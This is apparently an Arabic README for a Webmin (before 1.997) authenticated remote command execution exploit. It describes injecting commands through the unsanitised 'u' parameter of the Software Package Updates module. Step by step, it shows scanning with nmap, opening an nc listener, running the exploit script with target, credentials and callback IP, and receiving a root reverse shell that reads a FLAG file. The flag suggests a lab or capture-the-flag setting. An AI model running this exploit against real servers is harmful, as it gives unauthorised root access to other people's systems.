
استغلال تنفيذ تعليمات برمجية عن بُعد مصادق عليه لـ Webmin < 1.997 عبر وحدة تحديث حزم البرامج. يحقن أوامر عشوائية كجذر من خلال معلمة غير معقمة، مما يقدم شلًا عكسيًا.
استغلال لثغرة تنفيذ الأوامر عن بُعد في Webmin الإصدارات الأقدم من 1.997، عبر وحدة Software Package Updates.
وحدة Software Package Updates في Webmin لا تقوم بتعقيم المعامل u بشكل صحيح قبل تمريره إلى النظام. يمكن لمستخدم مصادق عليه مع صلاحية الوصول إلى تلك الوحدة حقن أوامر عشوائية تُنفذ كـ root.
قم بتثبيت التبعيات قبل تشغيل الاستغلال:
pip3 install requests beautifulsoup4 lxml urllib3
| المعلمة | الوصف | مثال |
|---|
-t | عنوان الهدف (بدون منفذ) | https://192.168.1.10 |
-u | مستخدم Webmin | admin |
-p | كلمة مرور Webmin | password123 |
-l | عنوان IP الخاص بك (حيث تستقبل الشل) | 192.168.1.5 |
-lp | المنفذ الذي تستمع عليه | 4444 |
1 — تحديد عنوان IP للهدف باستخدام Nmap:
nmap -sV TARGET_IP
# Busca el puerto 10000 con Webmin
2 — افتح المستمع على جهازك:
nc -lvnp 4444
3 — في محطة أخرى، قم بتشغيل الاستغلال:
python3 exploit.py \
-t https://TARGET_IP \
-u admin \
-p PASSWORD \
-l TU_IP \
-lp 4444
4 — إذا نجح الاستغلال، سترى:
5 — على المستمع، ستستقبل شل كجذر:
# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}
# Terminal 1
nc -lvnp 4444
# Terminal 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444